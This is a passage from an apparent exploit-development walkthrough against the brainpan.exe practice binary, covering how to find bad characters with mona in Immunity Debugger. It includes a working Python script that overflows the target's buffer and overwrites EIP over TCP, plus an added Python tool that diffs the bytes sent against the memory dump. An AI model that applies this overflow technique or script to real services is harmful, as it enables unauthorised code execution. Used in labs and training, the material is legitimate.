
Finding bad characters

When crafting shellcode, it is crucial to know which byte values the target mangles, drops or truncates on (the bad characters) and which arrive in memory intact: a single bad byte inside the shellcode corrupts everything after it. To streamline finding them for our exploit, we use mona inside Immunity Debugger. First, we point mona at a working folder so that the files it generates are easy to find:

!mona config -set workingfolder c:\mona

[Image: Mona working directory]

With the working folder configured, we generate the byte array with mona. The -cpb option lists bytes we already know are bad so they are left out of the array; \x00 is excluded from the start because it terminates C strings and would cut the payload short before any other byte could be tested:

!mona bytearray -cpb "\x00"

[Image: Generate bad characters]

Mona writes two files to the working folder: bytearray.txt, which holds the array as a Python byte string ready to paste into a script, and bytearray.bin, the raw bytes that mona's compare command reads later.

[Image: Byte array]

We then send this byte array to the brainpan.exe TCP server directly after the four bytes that overwrite EIP, so that it lands where ESP points at the moment of the crash. For this purpose, I've created another script, brainpan_badchars.py, which appends mona's byte array to the payload.

#!/usr/bin/python3
import socket
import sys

# Byte array generated by mona (bytearray.txt); \x00 is already excluded
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

# Padding up to the saved return address, "BBBB" to overwrite EIP, then the
# byte array, which ends up at ESP when the process crashes
prefix = b'shitstorm /.:/'
buffer = b"A" * 510 + b"B" * 4 + badchars

# One connection is enough: the server crashes on the first payload
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('192.168.10.4', 9999))
    sock.sendall(prefix + buffer)
    sock.close()
except socket.error as e:
    print(f"Error connecting to the server: {e}")
    sys.exit(1)

After running the script, brainpan.exe crashes and we inspect the memory ESP points to in Immunity Debugger: right-click ESP in the registers pane and choose Follow in Dump. The dump pane then shows the bytes the Python script sent, starting with \x01:

[Image: ESP dump]

In this run ESP held the address 005FF910 (the value may differ from crash to crash, so read it from the registers pane each time rather than reusing an old one). To check which bytes were mangled on the way into the buffer, we ran mona's compare against that address from within Immunity Debugger:

!mona compare -f c:\mona\bytearray.bin -a 005FF910

Mona compared the array in bytearray.bin byte by byte with the memory at that address and reported any byte that was altered, dropped, or where the copy stopped.

[Image: Mona result]

For brainpan.exe, mona reports the array as unmodified: apart from \x00, which we excluded before sending, no byte is altered or dropped, so \x00 is the only bad character our shellcode has to avoid.
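To show what mona is doing in the bytearray and compare steps above, here is an added example that re-implements both in plain Python; it is not mona's code and not part of the original walkthrough. generate_bytearray() mirrors !mona bytearray -cpb, compare_dump() diffs the bytes sent against the bytes found at ESP and tells a rewritten byte from a swallowed one by re-aligning on the next expected value, and triage() runs the exclude-resend-compare loop until the array survives untouched. The target behaviour (a server that strips CR and LF and rewrites spaces as '+') is constructed for the demo, as is the trailing stack noise; brainpan.exe itself did nothing of the sort.

```python
#!/usr/bin/env python3
"""Bad-character triage for a stack overflow payload.

Added example, not mona's code: a dependency-free re-implementation of the
bytearray and compare steps so the logic can be inspected offline. The
target filter below is constructed for the demo.
"""


def generate_bytearray(exclude=(0x00,)):
    """All 256 byte values in order, minus the excluded ones (mona's -cpb)."""
    return bytes(b for b in range(256) if b not in exclude)


def compare_dump(expected, dump, max_gap=4):
    """Diff the bytes we sent (expected) against the bytes found at ESP (dump).

    Returns (bad_chars, status). Three ways a byte can go bad are handled:
      - rewritten in place (0x20 becoming 0x2b): the dump stays aligned,
      - swallowed (0x0a stripped): everything after it shifts left, possibly
        several bytes in a row (up to max_gap),
      - the copy stopping at a terminator: nothing after it can be trusted,
        so we stop and report the offset.
    Because the array is sequential, re-alignment is unambiguous: after a
    mismatch the next expected byte sits one position later in the dump
    (rewrite) or right at the current position (swallowed).
    """
    bad = []
    i = j = 0                              # i walks expected, j walks the dump
    while i < len(expected):
        if j >= len(dump):
            return bad, f"dump ends after {i} expected bytes"
        if expected[i] == dump[j]:
            i += 1
            j += 1
            continue
        if i + 1 == len(expected):         # last byte is bad; nothing to realign on
            bad.append(expected[i])
            break
        if j + 1 < len(dump) and dump[j + 1] == expected[i + 1]:
            bad.append(expected[i])        # rewritten in place, alignment kept
            i += 1
            j += 1
            continue
        for k in range(1, max_gap + 1):    # a run of k swallowed bytes?
            if i + k < len(expected) and dump[j] == expected[i + k]:
                bad.extend(expected[i:i + k])
                i += k
                break
        else:
            return bad, f"corruption after {i} bytes (0x{expected[i]:02x} unrecoverable)"
    return bad, ("modified" if bad else "unmodified")


def constructed_target_filter(data):
    """Stand-in for a vulnerable server that strips CR/LF and turns spaces
    into '+' before the data reaches the overflowed buffer (constructed)."""
    return data.replace(b"\r", b"").replace(b"\n", b"").replace(b" ", b"+")


def as_python_literal(arr, per_line=32):
    """Render a byte array the way bytearray.txt does, ready to paste into a script."""
    rows = [
        'b"' + "".join(f"\\x{b:02x}" for b in arr[off:off + per_line]) + '"'
        for off in range(0, len(arr), per_line)
    ]
    return "badchars = (\n    " + "\n    ".join(rows) + "\n)"


def triage(target=constructed_target_filter, exclude=(0x00,)):
    """Send the array, diff what survived, exclude the bad bytes and repeat
    until the array comes back unmodified. Returns (exclusions, status)."""
    exclude = tuple(exclude)
    for _ in range(256):                   # at most one new byte per round
        sent = generate_bytearray(exclude)
        dump = target(sent) + b"\xcc" * 16  # constructed: other stack data after our bytes
        bad, status = compare_dump(sent, dump)
        if not bad:
            return exclude, status
        exclude += tuple(bad)
    return exclude, "gave up"


if __name__ == "__main__":
    found, status = triage()
    print("bad chars:", " ".join(f"0x{b:02x}" for b in found), "->", status)
    print(as_python_literal(generate_bytearray(found)))
```

Running it reports 0x00, 0x0a, 0x0d and 0x20 after two rounds and prints the reduced array in the same layout as bytearray.txt. In practice each round is a real crash plus a Follow in Dump, which is why excluding \x00 before the first send saves a round: it would otherwise stop the copy at the very first byte and hide everything behind it.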

Now that we know \x00 is the only byte our exploit has to avoid, the next step is to find a suitable module for our payload.


Next, we'll proceed to Finding the right module